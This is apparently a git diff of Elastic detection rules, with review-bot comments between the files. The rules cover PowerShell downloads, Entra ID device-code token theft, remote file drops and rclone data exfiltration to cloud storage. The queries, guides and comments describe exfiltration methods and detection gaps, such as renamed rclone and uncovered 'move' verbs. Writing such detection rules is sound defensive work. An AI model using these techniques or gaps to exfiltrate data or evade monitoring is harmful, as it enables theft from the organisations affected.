Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=30s\n[network where host.os.type == \"windows\" and \n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n network.protocol == \"dns\" and\n not dns.question.name : (\n \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\",\n \"metadata.google.internal\", \"dist.nuget.org\", \"artifacts.elastic.co\", \"*.digicert.com\",\n \"*.chocolatey.org\", \"outlook.office365.com\", \"cdn.oneget.org\", \"ci.dot.net\",\n \"packages.icinga.com\", \"login.microsoftonline.com\", \"*.gov\", \"*.azure.com\", \"*.python.org\",\n \"dl.google.com\", \"sensor.cloud.tenable.com\", \"*.azurefd.net\", \"*.office.net\", \"*.anac*\",\n \"aka.ms\", \"dot.net\", \"*.visualstudio.com\", \"*.local\") and\n not user.id == \"S-1-5-18\" and\n /* Filter out NetBIOS/LLMNR-style names (e.g. host, localhost, etc.) 
*/\n dns.question.name regex \"\"\".*\\.[a-zA-Z]{2,5}\"\"\"]\n[file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"powershell.exe\" and \n (file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\", \"cmd\", \"vbs\", \"vbe\", \"js\", \"jse\", \"wsh\", \"wsf\", \"sct\", \"hta\", \"cpl\", \"scr\", \"pif\", \"com\") or file.Ext.header_bytes : \"4d5a*\") and\n not file.name : \"__PSScriptPolicy*.ps1\" and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\????????.dll\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\????????.dll\",\n \"?:\\\\Windows\\\\TEMP\\\\ansible-tmp-*\\\\AnsiballZ*.ps1\"\n ) and\n not user.id == \"S-1-5-18\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "33f306e8-417c-411b-965c-c2812d6d3f4d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and 
Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 115 + }, + "id": "33f306e8-417c-411b-965c-c2812d6d3f4d_115", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json b/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json deleted file mode 100644 index bf9bf60569e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json +++ /dev/null 
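Review bot: The DNS step of the sequence matches `process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe")`, but the file-creation step that must follow for the same `process.entity_id` only matches `process.name : "powershell.exe"`, so a download performed by `pwsh.exe` or `powershell_ise.exe` can never complete the sequence and those two names are dead in the first step. Either widen the second step to the same list, `process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and`, or narrow the first step to `powershell.exe` so the stated coverage is accurate. The investigation guide also tells the analyst to search for 4624 logons `after the registry modification`, though this rule correlates only network and file events and no registry event is involved; that sentence looks carried over from another guide. The `*.gov` and `*.anac*` DNS exclusions are broad (the latter matches any name containing `.anac`, not only Anaconda hosts), so it is worth confirming that breadth is intended.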
@@ -1,176 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies concurrent Entra ID sign-in events for the same user and session from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources.", - "false_positives": [ - "Users authenticating from multiple devices and using the deviceCode protocol or the Visual Studio Code client." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Suspicious Microsoft Entra ID Concurrent Sign-Ins via DeviceCode", - "note": "## Triage and analysis\n\n### Investigating Suspicious Microsoft Entra ID Concurrent Sign-Ins via DeviceCode\n\n### Possible investigation steps\n\n- Review the sign-in logs to assess the context and reputation of the source.ip address.\n- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious.\n- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise.\n- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access.\n- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user.\n\n### Response and remediation\n\n- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. 
This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions.\n- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid.\n- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse.\n- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise.\n- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts.\n- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats.\n- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event.", - "query": "from logs-azure.signinlogs-* metadata _id, _version, _index\n\n| where event.category == \"authentication\" and event.dataset == \"azure.signinlogs\" and\n azure.signinlogs.properties.original_transfer_method == \"deviceCodeFlow\"\n\n| Eval Esql.interactive_logon = CASE(azure.signinlogs.category == \"SignInLogs\", source.ip, null),\n Esql.non_interactive_logon = CASE(azure.signinlogs.category == \"NonInteractiveUserSignInLogs\", source.ip, null)\n\n| stats Esql.count_logon = count(*),\n Esql.timestamp_values = values(@timestamp),\n Esql.source_ip_count_distinct = count_distinct(source.ip),\n Esql.is_interactive = count(Esql.interactive_logon),\n Esql.is_non_interactive = count(Esql.non_interactive_logon),\n Esql.user_agent_count_distinct = COUNT_DISTINCT(user_agent.original),\n Esql.user_agent_values = 
VALUES(user_agent.original),\n Esql.azure_signinlogs_properties_client_app_values = values(azure.signinlogs.properties.app_display_name),\n Esql.azure_signinlogs_properties_client_app_values = values(azure.signinlogs.properties.app_id),\n Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name),\n Esql.azure_signinlogs_properties_auth_requirement_values = values(azure.signinlogs.properties.authentication_requirement),\n Esql.azure_signinlogs_properties_tenant_id = values(azure.tenant_id),\n Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code),\n Esql.message_values = values(message),\n Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id),\n Esql.source_ip_values = VALUES(source.ip) by azure.signinlogs.properties.session_id, azure.signinlogs.identity\n\n| where Esql.is_interactive >= 2 and Esql.is_non_interactive >= 1 and (Esql.source_ip_count_distinct >= 2 or Esql.user_agent_count_distinct >= 2)\n| keep\n Esql.*,\n azure.signinlogs.properties.session_id,\n azure.signinlogs.identity\n", - "references": [ - "https://learn.microsoft.com/en-us/entra/identity/", - "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins", - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", - "https://www.wiz.io/blog/recent-oauth-attacks-detection-strategies" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_auth_requirement_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_client_app_values", - "type": "keyword" - }, - { - 
"ecs": false, - "name": "Esql.azure_signinlogs_properties_resource_display_name_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_resource_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_status_error_code_values", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_tenant_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.count_logon", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.is_interactive", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.is_non_interactive", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.message_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.source_ip_count_distinct", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.source_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.timestamp_values", - "type": "date" - }, - { - "ecs": false, - "name": "Esql.user_agent_count_distinct", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.user_agent_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.identity", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.session_id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "3db029b3-fbb7-4697-ad07-33cbfd5bd080", - "setup": "#### Required Azure Entra Sign-In Logs\nThis rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. 
In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.\n", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/", - "subtechnique": [ - { - "id": "T1566.002", - "name": "Spearphishing Link", - "reference": "https://attack.mitre.org/techniques/T1566/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "3db029b3-fbb7-4697-ad07-33cbfd5bd080_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_3.json b/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_3.json deleted file mode 100644 index 3953c0544ac..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_3.json +++ /dev/null 
@@ -1,97 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the creation of a file in a world-writeable directory through a service that is commonly used for file transfer. This behavior is often associated with lateral movement and can be an indicator of an attacker attempting to move laterally within a network.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file*", - "auditbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Remote File Creation in World Writeable Directory", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Remote File Creation in World Writeable Directory\n\nIn Linux environments, world-writeable directories like `/tmp` and `/var/tmp` are used for temporary file storage, accessible by all users. Adversaries exploit these directories to deposit malicious files via remote services such as SSH or FTP, facilitating lateral movement. 
The detection rule identifies file creation events in these directories by non-root users using common file transfer services, signaling potential unauthorized activity.\n\n### Possible investigation steps\n\n- Review the file creation event details, focusing on the file path to determine if it matches any known malicious patterns or if it is unusual for the environment.\n- Identify the user associated with the file creation event by examining the user.id field, and verify if this user should have access to the affected directory.\n- Investigate the process responsible for the file creation by analyzing the process.name field to determine if it aligns with expected usage patterns for the user and system.\n- Check the source IP address and connection details related to the file transfer service used (e.g., SSH, FTP) to identify any suspicious or unauthorized access attempts.\n- Correlate the event with other recent activities on the host to identify any patterns of lateral movement or other suspicious behavior.\n- Review historical data for similar file creation events by the same user or process to assess if this is part of a recurring pattern or an isolated incident.\n\n### False positive analysis\n\n- Routine administrative tasks: System administrators often use file transfer services like scp or rsync to move files for legitimate purposes. To reduce false positives, create exceptions for known administrative accounts or specific file paths that are regularly used for maintenance.\n- Automated scripts and cron jobs: Automated processes may create temporary files in world-writeable directories. Identify and whitelist these scripts or jobs by their process names or user accounts to prevent unnecessary alerts.\n- Software updates and installations: Some software updates or installations may temporarily use world-writeable directories. 
Monitor and document these activities, and consider excluding specific update processes or package managers from the rule.\n- Development and testing environments: Developers may use these directories for testing purposes. Establish a separate monitoring policy for development environments or exclude known developer accounts to minimize false positives.\n- Backup operations: Backup tools might use temporary directories for staging files. Identify these tools and their typical behavior, and create exceptions based on their process names or user IDs.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further lateral movement by the adversary.\n- Terminate any suspicious processes associated with file transfer services (e.g., scp, ssh, ftp) that are not part of legitimate user activity.\n- Remove any unauthorized files created in world-writeable directories such as /tmp, /var/tmp, or /dev/shm to eliminate potential threats.\n- Conduct a thorough review of user accounts and permissions, focusing on non-root users who have recently accessed the system, to identify any unauthorized access.\n- Reset credentials for compromised or potentially compromised accounts to prevent further unauthorized access.\n- Monitor network traffic for unusual patterns or connections to external IP addresses that may indicate ongoing or additional compromise attempts.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems have been affected, ensuring a coordinated response.\n", - "query": "file where host.os.type == \"linux\" and event.action == \"creation\" and\nprocess.name in (\"scp\", \"sshd\", \"ssh\", \"ftp\", \"sftp\", \"vsftpd\", \"sftp-server\", \"rsync\") and\nfile.path like~ (\"/tmp*\", \"/var/tmp*\", \"/dev/shm/*\", \"/home/.*\") and user.id != \"0\"\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": 
[ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "3e528511-7316-4a6e-83da-61b5f1c07fd4", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.004", - "name": "SSH", - "reference": "https://attack.mitre.org/techniques/T1021/004/" - } - ] - }, - { - "id": "T1570", - "name": "Lateral Tool Transfer", - "reference": "https://attack.mitre.org/techniques/T1570/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 3 - }, - "id": "3e528511-7316-4a6e-83da-61b5f1c07fd4_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e_1.json b/packages/security_detection_engine/kibana/security_rule/3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e_1.json new file mode 100644 index 00000000000..88c3e2c92da 
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e_1.json
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies abuse of rclone (or a renamed copy, e.g. disguised as a security or backup utility) to exfiltrate data to cloud storage or remote endpoints. Rclone is a legitimate file sync tool; threat actors rename it to blend with administrative traffic and use copy/sync with cloud backends (e.g. :s3:) and include filters to exfiltrate specific file types.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Data Exfiltration via Rclone", + "note": "## Triage and analysis\n\n### Investigating Potential Data Exfiltration via Rclone\n\nRclone is a legitimate file synchronization tool. Threat actors abuse it (often renamed, e.g. to TrendFileSecurityCheck.exe) to exfiltrate data to S3, HTTP endpoints, or other cloud backends, using `copy`/`sync` with `--include` filters and high `--transfers` to move specific file types at scale.\n\n### Possible investigation steps\n\n- Confirm the command line for `copy`/`sync`, cloud backend (e.g. `:s3:`, `:http`), and options like `--include`, `--transfers`, `-P`.\n- If the process name is not `rclone.exe`, compare with `process.pe.original_file_name`; a mismatch indicates a renamed copy used to evade name-based detection.\n- From the command line, identify the source path (e.g. 
UNC or local) and the remote backend (S3 bucket, HTTP endpoint) as the exfil destination.\n- Review `--include`/`--exclude` and `--max-age`/`--max-size` to understand what data was targeted (documents, CAD, archives, etc.).\n- Correlate with the process executable path (recently dropped?), parent process, and user; look for outbound network to the same backend.\n\n### False positive analysis\n\n- Legitimate backup or sync jobs using rclone from a known path and config may trigger; allowlist by process path or `--config` path for approved rclone usage.\n\n### Response and remediation\n\n- Terminate the rclone process and isolate the host if exfiltration is confirmed.\n- Identify and revoke access to the destination (S3 bucket, API keys, etc.); preserve logs for the exfil session.\n- Determine scope of data exposed and notify stakeholders; rotate credentials and secrets that may have been in exfiltrated paths.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"rclone.exe\" or ?process.pe.original_file_name == \"rclone.exe\") and process.args : (\"copy\", \"sync\") and\n not process.args : (\"--config=?:\\\\Program Files\\\\rclone\\\\config\\\\rclone\\\\rclone.conf\", \"--config=?:\\\\Program Files (x86)\\\\rclone\\\\config\\\\rclone\\\\rclone.conf\") and \n not process.executable : (\"?:\\\\Program Files*\", \"\\\\Device\\\\HarddiskVolume*\\\\Program Files*\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1048/", + "https://rclone.org/commands/rclone_copy/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + 
"name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_4.json b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_4.json deleted file mode 100644 index 937b2e0c377..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_4.json +++ /dev/null 
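Review bot: The subcommand filter `process.args : ("copy", "sync")` in the new rule's query misses rclone's other transfer verbs, so an operator running `rclone move`, `copyto` or `moveto` (same exfiltration outcome, and `move` also removes the source files) raises no alert; I would widen it to `process.args : ("copy", "sync", "move", "copyto", "moveto")` and mention those verbs in the description and investigation guide. The `not process.executable : ("?:\\Program Files*", "\\Device\\HarddiskVolume*\\Program Files*")` exclusion is also broad: any binary under a Program Files path is silenced, including a renamed rclone that an admin-level actor drops into a directory of their choosing, and the trailing `*` matches more than the rclone install directory, so consider anchoring the exclusion to the expected install path (`...\\rclone\\rclone.exe`) instead of the whole tree. Finally, detection of renamed copies rests entirely on `?process.pe.original_file_name`, which the Windows Security event-log sources listed in `index` (4688 process creation) presumably do not populate, so on those sources only the literal `rclone.exe` name is caught; a sentence in `note` stating that limitation would set triage expectations correctly.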
@@ -1,94 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Identifies the use of built-in tools attackers can use to discover running processes on an endpoint.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "Process Discovery via Built-In Applications", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.name in (\n \"ps\", \"pstree\", \"htop\", \"pgrep\"\n) and \nnot process.parent.name in (\"amazon-ssm-agent\", \"snap\")\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "3f4d7734-2151-4481-b394-09d7c6c91f75", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1057", - "name": "Process Discovery", - "reference": "https://attack.mitre.org/techniques/T1057/" - }, - { - "id": "T1518", - "name": "Software Discovery", - "reference": "https://attack.mitre.org/techniques/T1518/", - "subtechnique": [ - { - "id": "T1518.001", - "name": "Security Software Discovery", - "reference": "https://attack.mitre.org/techniques/T1518/001/" - } - ] - } - ] - } - ], - "timestamp_override": 
"event.ingested", - "type": "eql", - "version": 4 - }, - "id": "3f4d7734-2151-4481-b394-09d7c6c91f75_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/428e9109-dc13-4ae9-84cb-100464d4c6fa_3.json b/packages/security_detection_engine/kibana/security_rule/428e9109-dc13-4ae9-84cb-100464d4c6fa_3.json deleted file mode 100644 index e7e6971c0fc..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/428e9109-dc13-4ae9-84cb-100464d4c6fa_3.json +++ /dev/null 
